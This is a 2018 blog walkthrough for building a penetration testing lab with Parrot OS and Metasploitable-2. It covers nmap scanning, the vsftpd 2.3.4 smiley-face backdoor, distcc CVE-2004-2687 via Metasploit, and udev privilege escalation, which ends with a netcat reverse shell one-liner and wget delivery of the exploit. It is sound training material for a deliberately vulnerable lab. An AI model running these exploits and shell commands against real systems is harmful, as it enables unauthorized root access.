Basic Penetration testing lab — 1

I am setting up a new lab for me and thought to document the process, so anyone wants to do the same can take references from this post. I am writing this one from scratch and I will also add more parts as I move forward.


  1. Downloading all the things.
  2. Creating Virtual machines
  3. Configuring Virtual machines
  4. Reconnaissance
  5. Exploiting Common vulnerabilities — Metasploitable-2
  6. Credits

1. Downloading all the Things.

2. Creating Virtual Machines.

Parrot OS

Click on the “Install from disc or image” and locate your ISO and Provide default configs, you can choose the memory and size according to your need.

Provide the location of the Parrot OS.

You can use “live mode” or install. I preferred the Installed version.


The installation process is similar to the ParrotOS.

You can provide the memory and size according to your need but keep in mind. You should keep the host machine in mind during providing custom memory and size.

3. Configuring Virtual Machines

For setting up a penetration testing lab it is important to make the connection between the machines locally. For doing that you have to use the “Bridge Connection” in the network settings.


You can use according to your requirements. You can use according to your requirements.


4. Reconnaissance

Startup both machines ParrotOS & Metasploitable-2.


Login with the following credentials.

Username: msfadmin
Password: msfadmin

Local IP address for Metasploitable-2 using


Metasploitable-2 local IP:


Login with your credentials.

default credentials for parrotOS

Username: user

Password : toor

Find the IP address for ParrotOS using the following command.


ParrotOS : local IP

Port scanning Metasploitable-2 using ParrotOS

nmap -A -oX /home/ehsahil/Desktop/metaspliot2-nmap-scan.xml

the output is in XML format, let’s convert it in the more organized way.

for doing this we will use a utility known as “xsltproc” — which will convert the XML into the html.

xsltproc /home/ehsahil/Desktop/metasploit2-nmap-scan.xml -o /home/ehsahil/Desktop/metasploit2-nmap-scan.xml

5. Exploiting Common Vulnerabilities.

Metasploitable — 2

1. Exploiting vsftpd 2.3.4

2. Exploiting Distcc V1 — CVE-2004–2687

1. Exploiting vsftpd 2.3.4.

Aim: Exploit VSFTPD daemon and obtain root access.

Scanning port 21 using nmap.

nmap -sV -p 21

port 21 is open and using vsftpd version 2.3.4.

Searching online for the publicly available exploit for this particular version.

vsftp 2.3.4 exploits

Exploiting manually.


username: — ehsahil:)
Password — Nothing just enter

PS: smiley emoji :) is important at the end, :) it will be used to trigger the backdoor.

now, we need to listen to port 6200 because backdoor opened the port 6200

nc -vvn 6200

Exploiting Using Metasploitable-2.

Start Metasploitable-2 by using the msfconsole command.


Metasploit Commands.

search vsftpd

use exploit/Unix/ftp/vsftpd_234_backdoor

show options



Background: This specific version of the vsftpd was infected with a backdoor by an intruder, the developers quickly responded by deleting the backdoor from the code. the users who upgraded to this version were vulnerable to the issue.

the backdoor is initiated when someone adds :) (smiley face) in the username during ftp handshake. then backdoor sets up a bind shell listener on port 6200.

Vulnerable Source code:

Detailed Source code review:

2. Exploiting Vulnerable DISTCC — CVE-2004–2687

Aim: Getting root access on the machine.

DISTCC V1 is known vulnerable application running on Metasploitable-2 but it is interesting because we have to escalate normal user to root using “Privilege Escalation”

Searching about distcc on online

distcc is a tool for speeding up the compilation of source code by using distributed computing over a computer network. With the right configuration, distcc can dramatically reduce a project’s compilation time.

distcc running on port 3632

Running nmap against port — 3632

nmap -sV -p 3632

Searching for the public exploit for distccd v1

Vulnerable to: CVE-2004–2687

Exploit publicly available.

Exploiting using Metasploit


metasploit commands.

search distcc

use exploit/unix/distcc_exec

show options



Currently, uid=1 and we cannot cat /etc/shadow , This indicated that we don’t have root privileges yet.

We need to leverage another vulnerability available in the installed components

for doing that we need to apply recon process to know more about the system.

Seeing all the shells available to us.

cat /etc/shells

GCC — Used for compiling exploits

which gcc

WGET — Used to download the exploit in the vulnerable machine

which wget

lets, see all the running processes.

ps aux

from the above processes, we can move forward to see publicly available exploits.

but, as we are using Metasploitable-2, we already know the vulnerable component, we will use that.

The vulnerable component is “udev”, let’s grep for it from the running processes.

Searching for exploits on searchsploit

searchsploit udev

We are interested in the exploit for “local privilege Escalation(2) — /exploits/linux/local/8572.c”

cat /usr/share/exploitdb/exploits/linux/local/8572.c

Exploit usage.

Steps for escalating daemon to root.

  1. Starting local Apache server — apache2

service apache2 start

2. Coping the exploit into the apache server public directory

Exploit directory — /usr/share/exploitdb/exploits/linux/local/

Apache servers public directory: /var/www/html

sudo /usr/share/exploitdb/exploits/linux/local/8572.c /var/www/html/ehsahil.c

3. Copying the exploit file into the vulnerable machine using wget.

ParrotOS IP:


our exploit code “ehsahil.c” has been copied to /tmp directory.

4. Creating a run file in /tmp directory — required by exploit

touch run #creating run file required by the exploit

#bash script to get the reverse shell.
echo ‘#!/bin/sh’ > run
echo ‘/bin/netcat -e /bin/bash 5555’ » run

5. Compiling our exploit code.

gcc ehsahil.c -o ehsahil

6. listening on post 5555

nc -lvnp 5555

7. PID of the udev Netlink socket

cat /proc/net/netlink

PID of the udev Netlink socket = 2718

8. Executable permission to Compiled Exploit.

chmod 755 ehsahil

9. Exploit.


./ehsahil 2718

Reverse shell obtained.

I will post more metasploitable2 common exploits as I practice them.


RWB NetSec

Feedback? hit me on twitter @ehsahil

Until Next time.

Written on September 16, 2018